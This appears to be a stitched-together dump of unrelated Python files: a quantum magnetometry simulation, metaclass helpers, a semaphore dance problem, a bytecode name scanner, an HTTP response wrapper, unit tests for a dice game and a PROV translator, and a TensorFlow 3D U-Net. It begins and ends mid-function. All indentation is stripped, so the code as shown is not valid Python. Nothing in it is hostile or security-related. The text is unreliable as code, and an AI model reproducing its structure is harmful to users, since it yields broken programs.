psum += np.abs(i)**2
return np.isclose(psum, 1.0)
def unitary_concat(cache, index):
unitary = cache[0]
for u in cache[1:index]:
unitary = u @ unitary
return unitary
def dict_sanitise(params):
"""
Function that ensures no Value errors for C dict retrieval
"""
# set parameter dictionary to defaults if not specified
cparams = {"tstart": 0.0,
"tend": 1e-4,
"dt": 1e-5,
"savef": 1,
"larmor": gyro,
"phi": 0,
"rabi": 0,
"rff": 0,
"rph": 0,
"proj": meas1["0"],
"quad": 0,
"dett": 1e4,
"detA": 0,
"dete": 1,
"xlamp": 0.0,
"xlfreq": 50,
"xlphase": 0.0,
"tr2": 0.0,
"zlamp": 0.0,
"zlfreq": 50,
"zlphase": 0.0,
"beta": 10,
"nt": 1e4,
"nf": 1,
"sA": 0.0,
"cdtrabi": 0.0,
"sdtrabi": 0.0,
"ctcrabi": 1.0,
"stcrabi": 0.0,
"cdtxl": 0.0,
"sdtxl": 0.0,
"ctcxl": 1.0,
"stcxl": 0.0,
}
# overwrite defaults
for p in cparams.keys():
# default value to zero (kills all not specified components)
if p not in params.keys():
cparams[p] = 0.0
else:
cparams[p] = params[p]
# set end spike default so a single spike occurs
if 'nte' not in cparams.keys():
cparams["nte"] = cparams["nt"] + 1/cparams["nf"]
return cparams
def state2pnt(cache):
"""
maps a state cache to a set of bloch vector points suitable for plotting
"""
x, y, z = [], [], []
pnts = []
for i in cache[::2]:
pnts.append(remap(np.matrix(i)))
for vec in pnts:
x.append(vec[0])
y.append(vec[1])
z.append(vec[2])
return [x, y, z]
def frame_analyser(state_cache, frame=["interaction", "lab"], time=None, larmor=gyro, omega=1e4, detuning=1e-9, project=meas1["0"]):
"""
Investigates the state evolution of a system in the lab frame in
terms of more interesting ones.
"""
# determine dimensionality of quantum system
dim = np.shape(state_cache[0])[0]
# time step size
dt = time[1] - time[0]
# compute reference frame map (bit crude but sufficient for its temporary use)
if callable(frame):
assert time is not None, "No time vector supplied for callable unitary transform"
unitary_map = frame
elif frame == "interaction":
def unitary_map(t, larmor=larmor):
return np.asarray([[np.exp(1j*np.pi*larmor*t), 0], [0, np.exp(-1j*np.pi*larmor*t)]])
elif frame == "dressed":
# define dressed state transform
def dressed(t, omega=omega, detuning=detuning): return np.asarray([[np.cos(np.arctan(
omega/detuning)/2), -np.sin(np.arctan(omega/detuning)/2)], [np.sin(np.arctan(omega/detuning)/2), np.cos(np.arctan(omega/detuning)/2)]])
def unitary_map(t, larmor=larmor): return dressed(t) @ np.asarray([[np.exp(1j*np.pi*larmor*t), 0], [0, np.exp(-1j*np.pi*larmor*t)]])
else:
raise ValueError("Unrecognised reference frame")
# apply transform to states
if callable(unitary_map):
new_states = [unitary_map(t) @ state_cache[:, :, step] for step, t in enumerate(time)]
# for step,t in enumerate(time):
# print(unitary_map(step) @ np.asarray([[1],[1]])/np.sqrt(2))
else:
new_states = [unitary_map @ state for state in state_cache]
# compute projectors
nprobs = np.squeeze([np.abs(project @ nstate)**2 for i, nstate in enumerate(new_states)])
if time is not None:
# plot new probabilities
plt.plot(time, nprobs)
plt.ylim([0, 1])
plt.grid()
plt.show()
return state2pnt(new_states)
def stability_measure(time, omega, detune):
"""
Generates a plot of the derivative of the precession angle of a state
in the presence of a detuning field and compares it against the Rabi vector
as a function of time
"""
pass
def demodulate(time, signal, cfreq, fs):
"""
Performs simple demodulation of an input signal given carrier
frequency <cfreq> and sample rate <fs>.
"""
carrier_cos = np.cos(2*np.pi*cfreq*time)
carrier_sin = np.sin(2*np.pi*cfreq*time)
csignal = carrier_cos*signal
ssignal = carrier_sin*signal
# simple butterworth with cutoff at 2*cfreq
Wn = 2*cfreq/fs
b,a = scipy.signal.butter(3, Wn)
filt_cos = scipy.signal.lfilter(b,a, csignal)
filt_sin = scipy.signal.lfilter(b,a, ssignal)
plt.plot(time, filt_cos, label='Filtered Cosine')
plt.plot(time, filt_sin, label='Filtered Sine')
plt.grid(True)
plt.legend()
plt.show()
def pulse_gen(freq=100, tau=[1.0], amp=1, nte=[None]):
"""
Generates a multipulse signal with a pretty neat dynamic approach
"""
# define a box function
def box(t, start, end):
if not isinstance(t, np.ndarray):
t = np.asarray(t)
return (t > start) & (t < end)
# define sum function
def sig_sum(t, terms):
return sum(f(t) for f in terms)
# list to hold spike functions
terms = []
for time,end in zip(tau,nte):
if end is None:
# generate spike functions, avoiding variable reference issue
terms.append(lambda t, tau=time: box(t, tau, tau+1/freq)
* amp*np.sin(2*np.pi*freq*(t-tau)))
else:
# generate spike functions, avoiding variable reference issue
terms.append(lambda t, tau=time: box(t, tau, end)
* amp*np.sin(2*np.pi*freq*(t-tau)))
# generate final signal function
signal = lambda t, funcs=terms: sig_sum(t, funcs)
return signal
def input_output(f_range=[200, 400, 2], sig_range=[300, 400, 2], t=[0, 1/10, 1/1e3]):
"""
Computes a set of input/output transformation pairs as part of the map determination problem
"""
# number of signal samples to generate
K = len(np.arange(sig_range[0], sig_range[1], sig_range[2]))
# number of measurements to make
M = len(np.arange(f_range[0], f_range[1], f_range[2]))
# length of signal vector
N = len(np.linspace(t[2], t[1], int((t[1] - t[0])/t[2])))
# sensor array
sensor = np.zeros((M, K), dtype=float)
# source array
source = np.zeros((N, K), dtype=float)
# ensure reconstruction is possible
assert M <= K, "Need more signal data to reconstruct data array"
assert N == M, "Current investigation method requires same dimensionality"
# iterate over signal freqs
for k, sig_freq in enumerate(np.arange(sig_range[0], sig_range[1], sig_range[2])):
print("Computing sensor output for test signal {}/{}".format(k, K), end='\r')
# perform map operation
freqs, projs, signal = pseudo_fourier(
sig_amp=5, sig_freq=sig_freq, f_range=f_range, plot=False)
# store output projections and source signal
sensor[:, k] = projs
source[:, k] = signal
return source, sensor
def plot_gen_1(freqs, projs, time, sim_vars):
"""
Generates publication ready plots using compressive atomic sensing
"""
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
plt.style.use('dark_background')
plt.subplot(2, 1, 1)
plt.plot(time, signal(time), 'g-')
# plt.grid(True)
plt.title("Magnetic field signal", fontsize=18)
plt.ylim([-1, 1])
plt.ylabel("Amplitude (G)", fontsize=14)
plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 3))
plt.xlabel("Time (s)", fontsize=14)
plt.subplot(2, 1, 2)
#plt.stem(freqs, projs, linewidth=0.6, bottom=np.mean(projs))
plt.plot(freqs, projs, 'o-', linewidth=0.6, alpha=0.3,)
plt.ylabel("$|\langle 1 | \psi(t) \\rangle |^2 $", fontsize=16)
plt.xlabel("Tuning frequency (Hz)", fontsize=14)
plt.savefig("original.png", dpi=1500)
# plt.grid(True)
plt.show()
def signal_generate(time, sim_vars):
"""
Generates the neural signal defined by sim_vars
"""
# assume single pulse if not defined
if "nte" not in sim_vars.keys():
nte = sim_vars["tau"] + 1/sim_vars["sig_freq"]
sim_vars["nte"] = nte
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
signal = signal(time)
signal /= np.max(np.abs(signal))
return signal
def rmse(v1,v2):
"""
Computes RMSE between two input vectors
"""
return np.sqrt(np.mean((v1-v2)**2))
def plot_gen_2(freqs, projs, comp_f, comp_p, time, recon, sim_vars, savefig=False):
"""
Generates publication ready plots using compressive atomic sensing
"""
# generate original signal
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
signal = signal(time)
signal /= np.max(np.abs(signal))
recon /= np.max(np.abs(recon))
# format projections to expectation value
projs = 2*projs - 1
comp_p = 2*comp_p - 1
# get number of measuremens used
measurements = sim_vars["measurements"]
#plt.style.use('dark_background')
plt.subplot(2, 1, 1)
plt.plot(time, signal, 'g-')
plt.plot(time, recon, 'r-')
plt.legend(["Original","Reconstruction"])
plt.title("Magnetic field signal reconstruction with {} Fourier measurements using \"{}\" method".format(
measurements, sim_vars["method"]), fontsize=18)
plt.ylabel(r"Amplitude", fontsize=14)
plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 3))
plt.xlabel("Time (s)", fontsize=14)
plt.subplot(2, 1, 2)
plt.plot(freqs, projs, 'o-', alpha=0.3, linewidth=0.6, label="_nolegend_")
plt.plot(comp_f, comp_p, 'r*', linewidth=1.5, label="Sample frequencies")
plt.legend()
plt.ylabel(r"$\langle F_z \rangle $", fontsize=16)
plt.xlabel("Tuning frequency (Hz)", fontsize=14)
plt.figure(num=1, figsize=[12,9])
if savefig:
path = "C:\\Users\\Joshua\\Research\\Uni\\2018\\Project\\Latex\\Proj_Figures\\"
# save parameters to text file
fig_name = dict_write(path, sim_vars)
plt.savefig(path+fig_name+".png", transparent=True, dpi=1000)
plt.show()
|
import builtins
import copy
import types
from collections import defaultdict, deque
from typing import TypeVar, Any, Optional, Callable, Type, Dict, Iterable
__all__ = ['common_ancestor', 'create_class', 'resolve_bases', 'static_vars', 'static_copy']
T = TypeVar('T')
def create_class(name: str,
bases: Iterable = (),
attrs: dict = {},
metaclass: Optional[Callable[..., Type[T]]] = None,
**kwargs: Any
) -> Type[T]:
"""
Creates a new class. This is similar to :func:`types.new_class`,
except it calls :func:`resolve_bases` even in python versions
<= 3.7. (And it has a different interface.)
:param name: The name of the new class
:param bases: An iterable of bases classes
:param attrs: A dict of class attributes
:param metaclass: The metaclass, or ``None``
:param kwargs: Keyword arguments to pass to the metaclass
"""
if metaclass is not None:
kwargs.setdefault('metaclass', metaclass)
resolved_bases = resolve_bases(bases)
meta, ns, kwds = types.prepare_class(name, resolved_bases, kwargs)
ns.update(attrs)
# Note: In types.new_class this is "is not" rather than "!="
if resolved_bases != bases:
ns['__orig_bases__'] = bases
return meta(name, resolved_bases, ns, **kwds)
def resolve_bases(bases: Iterable) -> tuple:
"""
Clone/backport of :func:`types.resolve_bases`.
"""
result = []
for base in bases:
if isinstance(base, type):
result.append(base)
continue
try:
mro_entries = base.__mro_entries__
except AttributeError:
result.append(base)
continue
new_bases = mro_entries(bases)
result.extend(new_bases)
return tuple(result)
def static_vars(obj: Any):
"""
Like :func:`vars`, but bypasses overridden ``__getattribute__`` methods.
:param obj: Any object
:return: The object's ``__dict__``
:raises TypeError: If the object has no ``__dict__``
"""
try:
return object.__getattribute__(obj, '__dict__')
except AttributeError:
raise TypeError("{!r} object has no __dict__".format(obj)) from None
def static_copy(obj: Any):
"""
Creates a copy of the given object without invoking any of its methods -
``__new__``, ``__init__``, ``__copy__`` or anything else.
How it works:
1. A new instance of the same class is created by calling
``object.__new__(type(obj))``.
2. If ``obj`` has a ``__dict__``, the new instance's
``__dict__`` is updated with its contents.
3. All values stored in ``__slots__`` (except for ``__dict__``
and ``__weakref__``) are assigned to the new object.
An exception are instances of builtin classes - these are copied
by calling :func:`copy.copy`.
.. versionadded: 1.1
"""
from .classes import iter_slots
cls = type(obj)
# We'll check the __module__ attribute for speed and then also
# make sure the class isn't lying about its module
if cls.__module__ == 'builtins' and cls in vars(builtins).values():
return copy.copy(obj)
new_obj = object.__new__(cls)
try:
old_dict = static_vars(obj)
except TypeError:
pass
else:
static_vars(new_obj).update(old_dict)
for slot_name, slot in iter_slots(cls):
if slot_name in {'__dict__', '__weakref__'}:
continue
try:
value = slot.__get__(obj, cls)
except AttributeError:
pass
else:
slot.__set__(new_obj, value)
return new_obj
def common_ancestor(classes: Iterable[type]):
"""
Finds the closest common parent class of the given classes.
If called with an empty iterable, :class:`object` is returned.
:param classes: An iterable of classes
:return: The given classes' shared parent class
"""
# How this works:
# We loop through all classes' MROs, popping off the left-
# most class from each. We keep track of how many MROs
# that class appeared in. If it appeared in all MROs,
# we return it.
mros = [deque(cls.__mro__) for cls in classes]
num_classes = len(mros)
share_count = defaultdict(int)
while mros:
# loop through the MROs
for mro in mros:
# pop off the leftmost class
cls = mro.popleft()
share_count[cls] += 1
# if it appeared in every MRO, return it
if share_count[cls] == num_classes:
return cls
# remove empty MROs
mros = [mro for mro in mros if mro]
return object
|
import sys
import time
import random
from sync_utils import Thread, Semaphore, watch
NUM_LEADERS = 0
NUM_FOLLOWERS = 0
LEADERS_QUEUE = Semaphore(0)
FOLLOWERS_QUEUE = Semaphore(0)
MUTEX = Semaphore(1)
RENDEZVOUS = Semaphore(0)
def print_queue():
global NUM_LEADERS
global NUM_FOLLOWERS
sys.stdout.write("\tL: {} F: {}\n".format(NUM_LEADERS, NUM_FOLLOWERS))
def leader():
global NUM_LEADERS
global NUM_FOLLOWERS
MUTEX.acquire()
sys.stdout.write("Leader arrived.")
if NUM_FOLLOWERS:
NUM_FOLLOWERS -= 1
sys.stdout.write(" Pair passes.")
print_queue()
FOLLOWERS_QUEUE.signal()
else:
NUM_LEADERS += 1
sys.stdout.write(" Waiting.")
print_queue()
MUTEX.release()
LEADERS_QUEUE.wait()
sys.stdout.write("Leader dances.\n")
RENDEZVOUS.wait()
MUTEX.release()
def follower():
global NUM_LEADERS
global NUM_FOLLOWERS
MUTEX.acquire()
sys.stdout.write("Follower arrived.")
if NUM_LEADERS:
NUM_LEADERS -= 1
sys.stdout.write(" Pair passes.")
print_queue()
LEADERS_QUEUE.signal()
else:
NUM_FOLLOWERS += 1
sys.stdout.write(" Waiting.")
print_queue()
MUTEX.release()
FOLLOWERS_QUEUE.wait()
sys.stdout.write("Follower dances.\n")
RENDEZVOUS.signal()
def main():
while True:
time.sleep(0.25)
person = leader if random.randint(0, 1) else follower
Thread(person)
watch(main)
|
#._cv_part guppy.etc.Code
def co_code_findloadednames(co):
"""Find in the code of a code object, all loaded names.
(by LOAD_NAME, LOAD_GLOBAL or LOAD_FAST) """
from opcode import HAVE_ARGUMENT, opmap
hasloadname = (opmap['LOAD_NAME'],opmap['LOAD_GLOBAL'],opmap['LOAD_FAST'])
code = co.co_code
nargs = co.co_argcount
len_co_names = len(co.co_names)
indexset = {}
n = len(code)
i = 0
while i < n:
c = code[i]
op = ord(c)
i = i+1
if op >= HAVE_ARGUMENT:
if op in hasloadname:
oparg = ord(code[i]) + ord(code[i+1])*256
name = co.co_names[oparg]
indexset[name] = 1
if len(indexset) >= len_co_names:
break
i = i+2
for name in co.co_varnames:
try:
del indexset[name]
except KeyError:
pass
return indexset
def co_findloadednames(co):
"""Find all loaded names in a code object and all its consts of code type"""
names = {}
names.update(co_code_findloadednames(co))
for c in co.co_consts:
if isinstance(c, type(co)):
names.update(co_findloadednames(c))
return names
|
# -*- coding: utf-8 -*-
from requests import Response, Session
class SafeResponse(object):
def __init__(self, success, response=None, session=None):
self.__success: bool = success
self.__response: Response = response
self.__session: Session = session
def __repr__(self):
if self.success:
status = "Success: %s" % self.response.status_code
else:
status = "Failed"
return '<SafeResponse [%s]>' % status
@property
def success(self):
return self.__success
@property
def response(self):
if self.success:
return self.__response
else:
return None
@property
def status_code(self):
if self.success:
return self.__response.status_code
else:
return None
@property
def session(self):
if self.success:
return self.__session
else:
return None
class StatusFilter(set):
def interpret_options(self):
""" Interpret option set
1. Parse :class `range`
2. Make positive list
range(100,600) if len*(positive) == 0
:return: positive-set, negative-set
"""
positive = set()
negative = set()
for item in self:
# Case <range item>
if type(item) == range:
if item.start + item.stop > 0:
positive |= set(item)
else:
negative |= set(item)
# Case <int item>
elif type(item) == int:
if item >= 100:
positive.add(item)
elif item <= -100:
negative.add(item)
else:
raise ValueError("Interpret Failed")
return positive, negative
def pass_list(self):
r""" Make include list from options
:return: list `include list`
:rtype: list
"""
positive: set
negative: set
positive, negative = self.interpret_options()
# If positive set is empty, make all-pass-set of status code
if len(positive) == 0:
positive = set(range(100, 600))
# Exclude negative items
for item in negative:
while -item in positive:
positive.remove(-item)
return list(positive)
def check(self, status_code):
r""" Test :param `status_code` is pass
:param status_code:
:return: success or fail
:rtype: bool
"""
if status_code in self.pass_list():
return True
else:
return False
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import unittest
from tcoc import hero
class TestDice(unittest.TestCase):
def test_simple_dice_roll(self):
# Simple, every result should be a number in the range [1, 6]
rolls = [hero.Hero.dice_roll(1) for _ in range(10000)]
self.assertTrue(all(0 < x <= 6 for x in rolls),
"Not all rolls of a single dice return a number "
"in the range [1, 6]")
def test_double_dice_roll(self):
# As you would surely know if you've ever played The Settlers
# of Catan, you know that the most common result of a 2-dice
# roll is 7.
# (Note): RNG being RNG, this test has failed randomly twice
rolls_counter = collections.Counter(
hero.Hero.dice_roll(2) for _ in range(10000))
most_common = max(rolls_counter, key=lambda x: rolls_counter[x])
self.assertEqual(most_common,
7,
"7 is not the most common result for 2-dice rolls")
class TestHero(unittest.TestCase):
def setUp(self):
self.test_hero = hero.Hero()
self.test_hero.magic_random_init()
def test_random_heros(self):
heroes = [hero.Hero() for _ in range(1000)]
self.assertTrue(all(7 <= h.skill <= 12 for h in heroes),
"Not all heroes have normal skills")
self.assertTrue(all(14 <= h.stamina <= 24 for h in heroes),
"Not all heroes have normal stamina")
self.assertTrue(all(7 <= h.luck <= 12 for h in heroes),
"Not all heroes have normal luck")
def test_hero_skill(self):
_init_value = self.test_hero.skill
self.test_hero.skill += 100
self.assertTrue(7 <= self.test_hero.skill <= 12,
"hero skill increased beyond initial value")
self.test_hero.skill -= 100
self.assertEqual(self.test_hero.skill, 0,
"hero skill decreased beyond zero")
self.test_hero.skill = _init_value
def test_hero_stamina(self):
_init_value = self.test_hero.stamina
self.test_hero.stamina += 100
self.assertTrue(14 <= self.test_hero.stamina <= 24,
"hero stamina increased beyond initial value")
self.test_hero.stamina -= 100
self.assertEqual(self.test_hero.stamina, 0,
"hero skill decreased beyond zero")
self.test_hero.stamina = _init_value
def test_hero_luck(self):
_init_value = self.test_hero.luck
self.test_hero.luck += 100
self.assertTrue(7 <= self.test_hero.luck <= 12,
"hero luck increased beyond initial value")
self.test_hero.luck -= 100
self.assertEqual(self.test_hero.luck, 0,
"hero luck decreased beyond zero")
self.test_hero.luck = _init_value
def test_hero_stamina_percentage(self):
self.test_hero.stamina -= 1
self.assertTrue(0 < self.test_hero.stamina_percentage < 1,
"hero stamina percentage is not a normal "
"ratio: %s" % self.test_hero.stamina_percentage)
def test_random_magic(self):
spells = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
self.assertEqual(spells, self.test_hero.magic,
"hero didn't equip the correct amount of spells")
def test_random_magic_cast(self):
start = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
first_spell = next(iter(self.test_hero.equipped_spells))
self.test_hero.magic_cast(first_spell)
end = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
self.assertEqual(
start - end,
1,
"cast fail {} {}".format(
self.test_hero, self.test_hero.equipped_spells))
def test_quickcombat_win(self):
_monster = hero.Monster(0, 1)
win, winner = self.test_hero.quick_combat(_monster)
self.assertTrue(win, "Lost unlosable quick combat")
self.assertEqual(winner, self.test_hero, "Wrong winner returned")
class TestMonster(unittest.TestCase):
def setUp(self):
self.test_monster = hero.Monster(10, 10)
def test_monster_stamina_percentage(self):
self.test_monster.stamina -= 3
self.assertEqual(self.test_monster.stamina_percentage, 0.7)
def test_monster_winpercentage(self):
win, survival, flawless = self.test_monster.winpercentage(10000)
self.assertTrue(0 <= win <= 1,
"Wrong value for wins: {}".format(win))
self.assertTrue(0 <= survival <= 1,
"Wrong value for survival: {}".format(survival))
self.assertTrue(0 <= flawless <= 1,
"Wrong value for survival: {}".format(flawless))
def test_monster_winpercentage_specific_hero(self):
test_hero = hero.Hero()
win, survival, flawless = self.test_monster.winpercentage(
10000, hero=test_hero)
self.assertTrue(0 <= win <= 1,
"Wrong value for wins: {}".format(win))
self.assertTrue(0 <= survival <= 1,
"Wrong value for survival: {}".format(survival))
self.assertTrue(0 <= flawless <= 1,
"Wrong value for survival: {}".format(flawless))
|
"""Unit tests for :mod:`prov_interop.provtranslator.converter`.
"""
# Copyright (c) 2015 University of Southampton
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import inspect
import os
import requests
import requests_mock
import tempfile
import unittest
from nose_parameterized import parameterized
from prov_interop import http
from prov_interop import standards
from prov_interop.component import ConfigError
from prov_interop.converter import ConversionError
from prov_interop.provtranslator.converter import ProvTranslatorConverter
class ProvTranslatorConverterTestCase(unittest.TestCase):
def setUp(self):
super(ProvTranslatorConverterTestCase, self).setUp()
self.provtranslator = ProvTranslatorConverter()
self.in_file = None
self.out_file = None
self.config = {}
self.config[ProvTranslatorConverter.URL] = \
"https://" + self.__class__.__name__
self.config[ProvTranslatorConverter.INPUT_FORMATS] = standards.FORMATS
self.config[ProvTranslatorConverter.OUTPUT_FORMATS] = standards.FORMATS
def tearDown(self):
super(ProvTranslatorConverterTestCase, self).tearDown()
for f in [self.in_file, self.out_file]:
if f != None and os.path.isfile(f):
os.remove(f)
def test_init(self):
self.assertEqual("", self.provtranslator.url)
self.assertEqual([], self.provtranslator.input_formats)
self.assertEqual([], self.provtranslator.output_formats)
def test_configure(self):
self.provtranslator.configure(self.config)
self.assertEqual(self.config[ProvTranslatorConverter.URL],
self.provtranslator.url)
self.assertEqual(self.config[ProvTranslatorConverter.INPUT_FORMATS],
self.provtranslator.input_formats)
self.assertEqual(self.config[ProvTranslatorConverter.OUTPUT_FORMATS],
self.provtranslator.output_formats)
def test_convert_missing_input_file(self):
self.provtranslator.configure(self.config)
self.in_file = "nosuchfile.json"
self.out_file = "convert_missing_input_file." + standards.JSON
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
def test_convert_invalid_input_format(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix=".nosuchformat")
self.out_file = "convert_invalid_input_format." + standards.PROVX
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
def test_convert_invalid_output_format(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + standards.JSON)
self.out_file = "convert_invalid_output_format.nosuchformat"
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
@parameterized.expand(standards.FORMATS)
def test_convert(self, format):
content_type = ProvTranslatorConverter.CONTENT_TYPES[format]
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + format)
(_, self.out_file) = tempfile.mkstemp(suffix="." + format)
doc = "mockDocument"
# Set up mock service response.
headers={http.CONTENT_TYPE: content_type,
http.ACCEPT: content_type}
with requests_mock.Mocker(real_http=False) as mocker:
mocker.register_uri("POST",
self.config[ProvTranslatorConverter.URL],
request_headers=headers,
text=doc)
self.provtranslator.convert(self.in_file, self.out_file)
with open(self.out_file, "r") as f:
self.assertEqual(doc, f.read(), "Unexpected output file content")
def test_convert_server_error(self):
self.provtranslator.configure(self.config)
(_, self.in_file) = tempfile.mkstemp(suffix="." + standards.JSON)
(_, self.out_file) = tempfile.mkstemp(suffix="." + standards.JSON)
# Set up mock service response with server error.
with requests_mock.Mocker(real_http=False) as mocker:
mocker.register_uri("POST",
self.config[ProvTranslatorConverter.URL],
status_code=requests.codes.internal_server_error)
with self.assertRaises(ConversionError):
self.provtranslator.convert(self.in_file, self.out_file)
|
# -*- coding: utf-8 -*-
"""Three-dimensional U-Net implemented in TensorFlow.
Reference
---------
Çiçek, Ö., Abdulkadir, A., Lienkamp, S. S., Brox, T., & Ronneberger, O. (2016)
3D U-Net: learning dense volumetric segmentation from sparse annotation.
International Conference on Medical Image Computing and Computer-Assisted
Intervention (pp. 424-432). Springer, Cham.
PDF available at https://arxiv.org/pdf/1606.06650.pdf.
"""
import tensorflow as tf
from tensorflow.contrib.estimator import TowerOptimizer
from tensorflow.contrib.estimator import replicate_model_fn
from tensorflow.python.estimator.canned.optimizers import (
get_optimizer_instance
)
from nobrainer import losses
from nobrainer import metrics
from nobrainer.models.util import check_optimizer_for_training
from nobrainer.models.util import check_required_params
from nobrainer.models.util import set_default_params
FUSED_BATCH_NORM = True
_regularizer = tf.contrib.layers.l2_regularizer(scale=0.001)
def _conv_block(x, filters1, filters2, mode, layer_num, batchnorm=True):
"""Convolution block.
Args:
x: float `Tensor`, input tensor.
filters1: int, output space of first convolution.
filters2: int, output space of second convolution.
mode: string, TensorFlow mode key.
batchnorm: bool, if true, apply batch normalization after each
convolution.
Returns:
`Tensor` of sample type as `x`.
Notes:
```
inputs -> conv3d -> [batchnorm] -> relu -> conv3d -> [batchnorm] -> relu
```
"""
training = mode == tf.estimator.ModeKeys.TRAIN
with tf.variable_scope('conv_{}_0'.format(layer_num)):
x = tf.layers.conv3d(
inputs=x, filters=filters1, kernel_size=(3, 3, 3), padding='SAME', kernel_regularizer=_regularizer)
if batchnorm:
with tf.variable_scope('batchnorm_{}_0'.format(layer_num)):
x = tf.layers.batch_normalization(
inputs=x, training=training, fused=FUSED_BATCH_NORM)
with tf.variable_scope('relu_{}_0'.format(layer_num)):
x = tf.nn.relu(x)
with tf.variable_scope('conv_{}_1'.format(layer_num)):
x = tf.layers.conv3d(
inputs=x, filters=filters2, kernel_size=(3, 3, 3), padding='SAME', kernel_regularizer=_regularizer)
if batchnorm:
with tf.variable_scope('batchnorm_{}_1'.format(layer_num)):
x = tf.layers.batch_normalization(
inputs=x, training=training, fused=FUSED_BATCH_NORM)
with tf.variable_scope('relu_{}_1'.format(layer_num)):
x = tf.nn.relu(x)
return x
def model_fn(features, labels, mode, params, config=None):
"""3D U-Net model function.
Args:
Returns:
Raises:
"""
volume = features
if isinstance(volume, dict):
volume = features['volume']
required_keys = {'n_classes'}
default_params ={
'optimizer': None,
'batchnorm': True,
}
check_required_params(params=params, required_keys=required_keys)
set_default_params(params=params, defaults=default_params)
check_optimizer_for_training(optimizer=params['optimizer'], mode=mode)
bn = params['batchnorm']
# start encoding
shortcut_1 = _conv_block(
volume, filters1=32, filters2=64, mode=mode, layer_num=0, batchnorm=bn)
with tf.variable_scope('maxpool_1'):
x = tf.layers.max_pooling3d(
inputs=shortcut_1, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
shortcut_2 = _conv_block(
x, filters1=64, filters2=128, mode=mode, layer_num=1, batchnorm=bn)
with tf.variable_scope('maxpool_2'):
x = tf.layers.max_pooling3d(
inputs=shortcut_2, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
shortcut_3 = _conv_block(
x, filters1=128, filters2=256, mode=mode, layer_num=2, batchnorm=bn)
with tf.variable_scope('maxpool_3'):
x = tf.layers.max_pooling3d(
inputs=shortcut_3, pool_size=(2, 2, 2), strides=(2, 2, 2),
padding='same')
x = _conv_block(
x, filters1=256, filters2=512, mode=mode, layer_num=3, batchnorm=bn)
# start decoding
with tf.variable_scope("upconv_0"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=512, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_1'):
x = tf.concat((shortcut_3, x), axis=-1)
x = _conv_block(
x, filters1=256, filters2=256, mode=mode, layer_num=4, batchnorm=bn)
with tf.variable_scope("upconv_1"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=256, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_2'):
x = tf.concat((shortcut_2, x), axis=-1)
x = _conv_block(
x, filters1=128, filters2=128, mode=mode, layer_num=5, batchnorm=bn)
with tf.variable_scope("upconv_2"):
x = tf.layers.conv3d_transpose(
inputs=x, filters=128, kernel_size=(2, 2, 2), strides=(2, 2, 2), kernel_regularizer=_regularizer)
with tf.variable_scope('concat_3'):
x = tf.concat((shortcut_1, x), axis=-1)
x = _conv_block(
x, filters1=64, filters2=64, mode=mode, layer_num=6, batchnorm=bn)
with tf.variable_scope('logits'):
logits = tf.layers.conv3d(
inputs=x, filters=params['n_classes'], kernel_size=(1, 1, 1),
padding='same', activation=None, kernel_regularizer=_regularizer)
# end decoding
with tf.variable_scope('predictions'):
predictions = tf.nn.softmax(logits=logits)
class_ids = tf.argmax(logits, axis=-1)
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'class_ids': class_ids,
'probabilities': predictions,
'logits': logits}
# Outputs for SavedModel.
export_outputs = {
'outputs': tf.estimator.export.PredictOutput(predictions)}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs=export_outputs)
onehot_labels = tf.one_hot(labels, params['n_classes'])
loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=onehot_labels, logits=logits)
